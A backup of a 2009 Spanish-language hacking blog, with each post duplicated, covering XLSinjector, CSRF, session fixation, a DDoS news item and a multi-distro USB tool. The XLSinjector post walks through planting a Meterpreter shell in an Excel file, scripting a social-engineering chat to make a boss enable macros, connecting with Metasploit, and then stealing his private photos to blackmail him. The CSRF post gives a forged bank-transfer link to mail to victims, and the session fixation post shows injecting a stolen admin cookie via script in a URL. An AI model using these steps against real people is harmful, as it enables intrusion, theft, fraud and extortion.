Backup Oficial de SeguridadBlanca.Org

lunes, 30 de noviembre de 2009

OSEH - Open Sec Ethical Hacker

Yo no tengo mucho que escribir, esta presentación lo dice todo.

http://www.open-sec.com/oseh/oseh.html


Suerte si entran al curso



Saludos
Dr.White

OSEH - Open Sec Ethical Hacker

Yo no tengo mucho que escribir, esta presentación lo dice todo.

http://www.open-sec.com/oseh/oseh.html


Suerte si entran al curso



Saludos
Dr.White

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

Desmintiendo Mi robo de Identidad (análisis)

Bueno, Como ya muchos lectores habrán leido en este artículo de elladodelmal se habla de que yo he escrito comentarios muy fuera de lugar insultando el Blog Un Informático del lado del mal a Maligno (chema) e inclusive poniendo en duda sus habilidades y pues aprovecharé este pequeño insidente de robo de identidad para que se denc cuenta de los problemas que se pueden causar.


1.- Nombres

Click aquí para ir a la entrada donde se ven mis supuestos comentarios.


Ahora como ven quien escribe es Dr White y no Dr.White a diferencia de como yo me llamo.


2.- El Link

Si dan Click a Dr White los lleva a http://seguridadblanca.blogspot.com web mia sin embargo yo cuando escribo comentarios siempre lo hago con mi usuario de blogger creo que esto consta en lugares en los que hago comentarios, pueden verificar en todas las entradas donde hay comentarios de SeguridadBlanca.


3.- La Forma de Hablar.

Yo soy informal a la hora de escribir pero simplemente no uso el término LOL en una entrada de blog y en un comentario tampoco y como se podrán dar cuenta yo siempre al final escribo Saludos sin embargo en esa ocación el que falsio mi identidad no lo hizo.


Comentarios Extra:

Soy Lector de ese blog y no se me pasaría por la cabeza atacar a un blog de esa manera con spam, yo hago publicidad de otras formas.



Como pueden ver la anterior imagen obtenida de la web de maligno muestra los comentarios hechos por un Ladron de identidad.


Con esto quiero acabar diciendo que hasta escribí una entrada para que lo visiten:

Click aquí para verla


Antes de Concluir quiero hablar de algo también:

Después de este sentido segundo post, el perdón ha llegado para el Doctor White… De todas formas, estas cosas del Astroturfing hacen que nos sintamos más importantes.

Maligno, no tienes nada que perdonarme por que no he hecho nada, me alaga que incluyas el nick Doctor White en una entrada de tu blog pero no me gusta que sea una como esta, de todas maneras quiero pedir disculpas por los malentendidos.

Aparte te encuentras en mis webs recomendadas y todo sería incapas de hacer algo asi...

Como se han dado cuenta lectores un robo de identidad es algo peligroso, tengan cuidado...


Saludos
Dr.White

Desmintiendo Mi robo de Identidad (análisis)

Bueno, Como ya muchos lectores habrán leido en este artículo de elladodelmal se habla de que yo he escrito comentarios muy fuera de lugar insultando el Blog Un Informático del lado del mal a Maligno (chema) e inclusive poniendo en duda sus habilidades y pues aprovecharé este pequeño insidente de robo de identidad para que se denc cuenta de los problemas que se pueden causar.


1.- Nombres

Click aquí para ir a la entrada donde se ven mis supuestos comentarios.


Ahora como ven quien escribe es Dr White y no Dr.White a diferencia de como yo me llamo.


2.- El Link

Si dan Click a Dr White los lleva a http://seguridadblanca.blogspot.com web mia sin embargo yo cuando escribo comentarios siempre lo hago con mi usuario de blogger creo que esto consta en lugares en los que hago comentarios, pueden verificar en todas las entradas donde hay comentarios de SeguridadBlanca.


3.- La Forma de Hablar.

Yo soy informal a la hora de escribir pero simplemente no uso el término LOL en una entrada de blog y en un comentario tampoco y como se podrán dar cuenta yo siempre al final escribo Saludos sin embargo en esa ocación el que falsio mi identidad no lo hizo.


Comentarios Extra:

Soy Lector de ese blog y no se me pasaría por la cabeza atacar a un blog de esa manera con spam, yo hago publicidad de otras formas.



Como pueden ver la anterior imagen obtenida de la web de maligno muestra los comentarios hechos por un Ladron de identidad.


Con esto quiero acabar diciendo que hasta escribí una entrada para que lo visiten:

Click aquí para verla


Antes de Concluir quiero hablar de algo también:

Después de este sentido segundo post, el perdón ha llegado para el Doctor White… De todas formas, estas cosas del Astroturfing hacen que nos sintamos más importantes.

Maligno, no tienes nada que perdonarme por que no he hecho nada, me alaga que incluyas el nick Doctor White en una entrada de tu blog pero no me gusta que sea una como esta, de todas maneras quiero pedir disculpas por los malentendidos.

Aparte te encuentras en mis webs recomendadas y todo sería incapas de hacer algo asi...

Como se han dado cuenta lectores un robo de identidad es algo peligroso, tengan cuidado...


Saludos
Dr.White

sábado, 28 de noviembre de 2009

PenTest: Cross Site Request Forgery

Este Bug es muy especial ya que con este podemos robar dinero de una manera muy fácil si el sistema de seguridad del banco no es bueno...


Primero quiero explicar un poco como funciona el ataque...

Nosotros descubrimos que las cookies de un banco duran mas del tiempo que deberían durar entonces si nosotros entramos a:

http://feisbuk.com --> nos logueamos

nos manda a:

http://feisbuk.com/home

ahora si nosotros entramos mañana y las cookies no se vencen como deberían y hay problemas con las sessiones entonces nos debería de mandar a

http://feisbuk.com/home --> sin haberse logueado el mismo dia

Ahora digamos que queremos agregar un amigo a feisbuk, nuestro amigo será Jorge Romero.

POST http://feisbuk.com/friends.php HTTP/1.1
...
...
...
...
======================
name=jorge&lname=romero


Como vemos tenemos la parte importante, lo que nos interesa es: name=jorge&lname=romero una ves que tenemos eso el resto ya es más fácil.

si nosotros quisieramos información sobre un tal david andrade el cual no nos acepta como amigo y sabemos que le gustan los carros podriamos hacer lo siguiente...

desde:

un mail cualquiera (podemos usar un mailer) mandarle un correo falso incluyendo lo siguien en el mail:


<a href="http://feisbuk.com/friends.php?name=seguridad&lname=blanca">Click para ver los últimos carros </a>


Si el diera click nosotros podriamos obtener su admistad automatica en feisbuk...

lógico esto no debería ocurrir por que los bancos deberían poner siertos tokens que duren minutos para agregar amigos y siempre ver referer y una cantidad de cosas para proteger al usuario.


Ahora si viene la parte que a muchos le ha de gustar y a otros le divertirá aprender esto...


Explotandolo en un banco:

Nuestro usuario del banco Armando Bronca le ah hecho una tranferencia de 10 Dolares a Perico Palotes y cuando dio click lo que se hizo fue esto...

http://bancodelanacionytodoslospaises.com/account/transferir.php?acct=pericopalotes&amount=10&moneda=dolar

ahora vamos a hacer lo mismo que hicimos en FeisBuk...

le mandamos un mail a nuestra victima que le gustan las motos diciendo algo como:


<a href="http://bancodelanacionytodoslospaises.com/account/transferir.php?acct=nosotros&amount=100000000&moneda=euro">Click aquí para ver las últimas motos </a>


Si nuestra victima da click nos habrá transferido mucho dinero...

ahora comprenden la gravedad sin mencionar los robos de información que ocurren por este bug...



Como podemos evitarlos siendo admin?

- Agregar tokens a casi todo
- siempre ver referer
- asegurar de que se caduquen las cookies y/o Sessiones


Con los tips de arriba creo que ya no sería tan fácil explotar algo como esto...

y como usuario?

- asegurate que las urls sean reales siempre
- no confies en la publicidad enviada por correo de sitios que no son serios


Bueno espero que con esto haya podido explicar que es el CSRF...


Suscribanse al Blog Plz...


Saludos
Dr.White

PenTest: Cross Site Request Forgery

Este Bug es muy especial ya que con este podemos robar dinero de una manera muy fácil si el sistema de seguridad del banco no es bueno...


Primero quiero explicar un poco como funciona el ataque...

Nosotros descubrimos que las cookies de un banco duran mas del tiempo que deberían durar entonces si nosotros entramos a:

http://feisbuk.com --> nos logueamos

nos manda a:

http://feisbuk.com/home

ahora si nosotros entramos mañana y las cookies no se vencen como deberían y hay problemas con las sessiones entonces nos debería de mandar a

http://feisbuk.com/home --> sin haberse logueado el mismo dia

Ahora digamos que queremos agregar un amigo a feisbuk, nuestro amigo será Jorge Romero.

POST http://feisbuk.com/friends.php HTTP/1.1
...
...
...
...
======================
name=jorge&lname=romero


Como vemos tenemos la parte importante, lo que nos interesa es: name=jorge&lname=romero una ves que tenemos eso el resto ya es más fácil.

si nosotros quisieramos información sobre un tal david andrade el cual no nos acepta como amigo y sabemos que le gustan los carros podriamos hacer lo siguiente...

desde:

un mail cualquiera (podemos usar un mailer) mandarle un correo falso incluyendo lo siguien en el mail:


<a href="http://feisbuk.com/friends.php?name=seguridad&lname=blanca">Click para ver los últimos carros </a>


Si el diera click nosotros podriamos obtener su admistad automatica en feisbuk...

lógico esto no debería ocurrir por que los bancos deberían poner siertos tokens que duren minutos para agregar amigos y siempre ver referer y una cantidad de cosas para proteger al usuario.


Ahora si viene la parte que a muchos le ha de gustar y a otros le divertirá aprender esto...


Explotandolo en un banco:

Nuestro usuario del banco Armando Bronca le ah hecho una tranferencia de 10 Dolares a Perico Palotes y cuando dio click lo que se hizo fue esto...

http://bancodelanacionytodoslospaises.com/account/transferir.php?acct=pericopalotes&amount=10&moneda=dolar

ahora vamos a hacer lo mismo que hicimos en FeisBuk...

le mandamos un mail a nuestra victima que le gustan las motos diciendo algo como:


<a href="http://bancodelanacionytodoslospaises.com/account/transferir.php?acct=nosotros&amount=100000000&moneda=euro">Click aquí para ver las últimas motos </a>


Si nuestra victima da click nos habrá transferido mucho dinero...

ahora comprenden la gravedad sin mencionar los robos de información que ocurren por este bug...



Como podemos evitarlos siendo admin?

- Agregar tokens a casi todo
- siempre ver referer
- asegurar de que se caduquen las cookies y/o Sessiones


Con los tips de arriba creo que ya no sería tan fácil explotar algo como esto...

y como usuario?

- asegurate que las urls sean reales siempre
- no confies en la publicidad enviada por correo de sitios que no son serios


Bueno espero que con esto haya podido explicar que es el CSRF...


Suscribanse al Blog Plz...


Saludos
Dr.White

viernes, 27 de noviembre de 2009

DDOS a elhacker.net

un Adolescente de 16 años le hizo un ataque DDOS (Distributed Denial Of Service) a elhacker.net y otros Servidores, el nick de este hacker es "n3ptuno" quien dijo a muchos miembros de elhacker.net que haría este ataque, la guardia civil de españa tomo cartas en el asunto y detuvo a n3ptuno, se han dicho muchas cosas de este ataque ya que elhacker.net es una comunidad de seguridad informatica si me lo preguntan la mas grande de habla hispana, se supone que son expertos en seguridad y mas pero...por que cayeron?

El Adolescente hizo una botnet inmensa de mas de 50,000 PCs, con estas maquinas zombies atacó elhacker y lo hizo caer durante un buen tiempo.





Opiniones:

Hoy escuche de todo hasta que los de elhacker y chema eran llorones pero no lo veo así el "adolescente" hizo un ataque en mi parecer un poco lammer, en primera que le ha hecho elhacker.net para que lo ataque? segundo quisiera saber porque tenia que decir que estaban siendo atacados por un adolescente de 16, muchas cosas me hacen pensar que este chico tiene falta de atención donde quiera que viva... bueno respeto le hecho de que haya creado una botnet tan grande, he tratado de escuchar y leer sobre muchos puntos de vista y pues no veo que error de seguridad pueda tener elhacker.net simplemente todos somos vulnerables a ddos, hasta FACEBOOK & TWITTER han caido...

Y Los de elhacker estan en todo su derecho de molestarse, que hicieron ellos para que los ataquen así...


Saludos
Dr.White

DDOS a elhacker.net

un Adolescente de 16 años le hizo un ataque DDOS (Distributed Denial Of Service) a elhacker.net y otros Servidores, el nick de este hacker es "n3ptuno" quien dijo a muchos miembros de elhacker.net que haría este ataque, la guardia civil de españa tomo cartas en el asunto y detuvo a n3ptuno, se han dicho muchas cosas de este ataque ya que elhacker.net es una comunidad de seguridad informatica si me lo preguntan la mas grande de habla hispana, se supone que son expertos en seguridad y mas pero...por que cayeron?

El Adolescente hizo una botnet inmensa de mas de 50,000 PCs, con estas maquinas zombies atacó elhacker y lo hizo caer durante un buen tiempo.





Opiniones:

Hoy escuche de todo hasta que los de elhacker y chema eran llorones pero no lo veo así el "adolescente" hizo un ataque en mi parecer un poco lammer, en primera que le ha hecho elhacker.net para que lo ataque? segundo quisiera saber porque tenia que decir que estaban siendo atacados por un adolescente de 16, muchas cosas me hacen pensar que este chico tiene falta de atención donde quiera que viva... bueno respeto le hecho de que haya creado una botnet tan grande, he tratado de escuchar y leer sobre muchos puntos de vista y pues no veo que error de seguridad pueda tener elhacker.net simplemente todos somos vulnerables a ddos, hasta FACEBOOK & TWITTER han caido...

Y Los de elhacker estan en todo su derecho de molestarse, que hicieron ellos para que los ataquen así...


Saludos
Dr.White

jueves, 26 de noviembre de 2009

Katana - Multiples Distros en tu USB

Los PenTesters muchas veces necesitamos ir a un lugar rápido y nuestra laptop está descargando algo entonces llegamos con un pendrive con un nubuntu y quiere que creemos un access point falso para monitorear a la gente del trabajo... entonces nosotros no sabemos como hacerlo con nubuntu, que mejor la ocación para tener en un pendrive o dispositivo USB muchas distros, justo en ese momento tener un Slax... no es tentador tener muchas en un mismo pendrive?... por eso les voy a mostrar esto... se llama Katana y nos permite bootear varias distros en un mismo USB...


Katana ha sacado su versión 1.0 en la cual estan la siguientes distribuciones:

* Backtrack 3
* Backtrack 4 beta
* the Ultimate Boot CD
* Organizational Systems Wireless Auditor (OSWA) Assistiant
* Slax 6
* Ophcrack XP
* Ophcrack Vista
* Damn Small Linux
* Damn Vulnerable Linux
================================

Espero les sirva para todos aquellos que siempre necesitamos estar en uno o en otro S.O o Distro...


PD: Perdí mi Pendrive con KATANA Recien estoy descargando de nuevo aquí les comparto la descarga...


Click Aquí para descargar

Web Oficial click aquí


Creador: .ronin ---> hackfromacave[dot]com



Saludos
Dr.White

Katana - Multiples Distros en tu USB

Los PenTesters muchas veces necesitamos ir a un lugar rápido y nuestra laptop está descargando algo entonces llegamos con un pendrive con un nubuntu y quiere que creemos un access point falso para monitorear a la gente del trabajo... entonces nosotros no sabemos como hacerlo con nubuntu, que mejor la ocación para tener en un pendrive o dispositivo USB muchas distros, justo en ese momento tener un Slax... no es tentador tener muchas en un mismo pendrive?... por eso les voy a mostrar esto... se llama Katana y nos permite bootear varias distros en un mismo USB...


Katana ha sacado su versión 1.0 en la cual estan la siguientes distribuciones:

* Backtrack 3
* Backtrack 4 beta
* the Ultimate Boot CD
* Organizational Systems Wireless Auditor (OSWA) Assistiant
* Slax 6
* Ophcrack XP
* Ophcrack Vista
* Damn Small Linux
* Damn Vulnerable Linux
================================

Espero les sirva para todos aquellos que siempre necesitamos estar en uno o en otro S.O o Distro...


PD: Perdí mi Pendrive con KATANA Recien estoy descargando de nuevo aquí les comparto la descarga...


Click Aquí para descargar

Web Oficial click aquí


Creador: .ronin ---> hackfromacave[dot]com



Saludos
Dr.White

miércoles, 25 de noviembre de 2009

Session Fixation

Este tipo de ataque no es un ataque que no hayamos visto pero lo escribo para complementar el robo de cookies que previamente he explicado.

El Session fixation es un Cookie Hijacking si lo vemos de esa manera... lo que haremos básicamente es mostrar que hacemos una ves que tenemos la cookie de un usuario en este caso el Admin...


entre lo que hemos visto tenemos estas dos opciones:

Session Prediction


Robo de Cookies por Xss


Quizás Ingeniería social de la cual aun no me doy el gusto de hablar, ahora les voy a explicar unas cuantas maneras de como tener la cookie del administrador, primero les quiero mostrar este grafico cortesía de OWASP.ORG...




como nos podemos dar cuenta básicamente nosotros nos ponemos la cookie y listo... ya podemos entrar pero hay multiples formas de ponernos dicha cookie yo les voy a mostrar como hacemos...


La primera forma que les mostraré será usando una t00l que ya deber{ian tener en sus PCs, el Live http headers

Digamos nuestros headers se ven algo como estos:

Keep-Alive: 300
Connection: keep-alive
Cookie: SESID=12343wfsdjksadjsde23

Ahora nosotros para poner la cookie que nos hemos robado hariamos algo como:


Keep-Alive: 300
Connection: keep-alive
Cookie: SESID=y34hw3kn0w4dm1n5c00k13

y hacemos un repetir, esto es bueno una manera de las mas usadas...


Ahora vamos a darle a una bien buena...


vamos a establecernos la Cookie por un codigo JavaScript...

Digamos que nuestra web es:

http://seguridadblanca.org/gurucms/

nosotros pondriamos algo como

http://seguridadblanca.org/gurucms/<script>document.cookie="SESID=y34hw3kn0w4dm1n5c00k13;</script>


Ahora con esto ya tenemos dos formas... Existe un ataque muy parecido conocido como cookie poisoning del cual hablaré luego para no confundirlos.


Espero les sirva el tutorial...


Saludos
Dr.White

Session Fixation

Este tipo de ataque no es un ataque que no hayamos visto pero lo escribo para complementar el robo de cookies que previamente he explicado.

El Session fixation es un Cookie Hijacking si lo vemos de esa manera... lo que haremos básicamente es mostrar que hacemos una ves que tenemos la cookie de un usuario en este caso el Admin...


entre lo que hemos visto tenemos estas dos opciones:

Session Prediction


Robo de Cookies por Xss


Quizás Ingeniería social de la cual aun no me doy el gusto de hablar, ahora les voy a explicar unas cuantas maneras de como tener la cookie del administrador, primero les quiero mostrar este grafico cortesía de OWASP.ORG...




como nos podemos dar cuenta básicamente nosotros nos ponemos la cookie y listo... ya podemos entrar pero hay multiples formas de ponernos dicha cookie yo les voy a mostrar como hacemos...


La primera forma que les mostraré será usando una t00l que ya deber{ian tener en sus PCs, el Live http headers

Digamos nuestros headers se ven algo como estos:

Keep-Alive: 300
Connection: keep-alive
Cookie: SESID=12343wfsdjksadjsde23

Ahora nosotros para poner la cookie que nos hemos robado hariamos algo como:


Keep-Alive: 300
Connection: keep-alive
Cookie: SESID=y34hw3kn0w4dm1n5c00k13

y hacemos un repetir, esto es bueno una manera de las mas usadas...


Ahora vamos a darle a una bien buena...


vamos a establecernos la Cookie por un codigo JavaScript...

Digamos que nuestra web es:

http://seguridadblanca.org/gurucms/

nosotros pondriamos algo como

http://seguridadblanca.org/gurucms/<script>document.cookie="SESID=y34hw3kn0w4dm1n5c00k13;</script>


Ahora con esto ya tenemos dos formas... Existe un ataque muy parecido conocido como cookie poisoning del cual hablaré luego para no confundirlos.


Espero les sirva el tutorial...


Saludos
Dr.White

martes, 24 de noviembre de 2009

Dos Cosas a Decir...

La primera es que ya hay dos papers en internet mios =) espero compartan la alegría conmigo hermanos.

Click Aquí para packetst0rmSecurity

Expl0it DB


Ahora como se habran dado cuenta he dejado de escribir un poco de PenTest, no se desanimen no dejaré el blog ni nada parecido, lo que pasa es que como escribo a diario se me están acabando las ideas de que escribir como pentest, aun me faltan temas pero quiero saberlos administrar asi que es su hora lectores.


Pueden Enviar un PAPER, BUG o Advis0r a security@seguridadblanca.org y despues de leerlo lo postearé sin ningun problema en el blog, aparte la persona que mas apoye al blog con esto se le dará una cuenta @seguridadblanca.org

Los papers o advisors o lo que sea que envien y sean apto para estar en el Blog se Expondrá de la siguiente manera:

Titulo del Articulo

Nick Creador


Los Papers o Advisors o lo que manden debe ser totalmente original, me encargaré personalmente de buscar y si no es el creador original automaticamente el email pasará a la lista negra al igual que el nick.


Espero nos apoyen, a partir de mañana comenzaré a exribir las entradas de siempre de pentesting pero quiero su apoyo para tener mas contenido en el blog.


Saludos
Dr.White

Dos Cosas a Decir...

La primera es que ya hay dos papers en internet mios =) espero compartan la alegría conmigo hermanos.

Click Aquí para packetst0rmSecurity

Expl0it DB


Ahora como se habran dado cuenta he dejado de escribir un poco de PenTest, no se desanimen no dejaré el blog ni nada parecido, lo que pasa es que como escribo a diario se me están acabando las ideas de que escribir como pentest, aun me faltan temas pero quiero saberlos administrar asi que es su hora lectores.


Pueden Enviar un PAPER, BUG o Advis0r a security@seguridadblanca.org y despues de leerlo lo postearé sin ningun problema en el blog, aparte la persona que mas apoye al blog con esto se le dará una cuenta @seguridadblanca.org

Los papers o advisors o lo que sea que envien y sean apto para estar en el Blog se Expondrá de la siguiente manera:

Titulo del Articulo

Nick Creador


Los Papers o Advisors o lo que manden debe ser totalmente original, me encargaré personalmente de buscar y si no es el creador original automaticamente el email pasará a la lista negra al igual que el nick.


Espero nos apoyen, a partir de mañana comenzaré a exribir las entradas de siempre de pentesting pero quiero su apoyo para tener mas contenido en el blog.


Saludos
Dr.White

lunes, 23 de noviembre de 2009

Comunidad de Habla Hispana BackTrack

Como muchos saben una de las mejores y mas reconocidas Distribuciones de PenTest es BackTrack, esta distro es excelente y ahora queremos la ayuda de todos los de habla hispana que la usen para hace runa comunidad...


lo que deben de hacer es entrar continuamente a:

irc.freenode.net

channel: #backtrack-es


y mantenerse activos ahí, todo el día se habla de uso de backtrack y pentesting, espero verlos por ahí.


Mutz y otros a diario pasan a ver como va la comunidad y si queremos nuestro subdominio .remote-exploit tenemos que esforzarnos para crecer.


Espero su apoyo.


Saludos
Dr.white

Comunidad de Habla Hispana BackTrack

Como muchos saben una de las mejores y mas reconocidas Distribuciones de PenTest es BackTrack, esta distro es excelente y ahora queremos la ayuda de todos los de habla hispana que la usen para hace runa comunidad...


lo que deben de hacer es entrar continuamente a:

irc.freenode.net

channel: #backtrack-es


y mantenerse activos ahí, todo el día se habla de uso de backtrack y pentesting, espero verlos por ahí.


Mutz y otros a diario pasan a ver como va la comunidad y si queremos nuestro subdominio .remote-exploit tenemos que esforzarnos para crecer.


Espero su apoyo.


Saludos
Dr.white

Torneo Codebit

Para ser Sincero prefiero la realidad a cualquier wargame ya que te da un margen de libertad en darte imaginación y pues sientes la obligación de resolver por ti solo en el caso que no sea wargame.

Pero hoy les voy a presentar uno muy bueno en especial si recien estamos empezando =)

CODEBIT.ORG


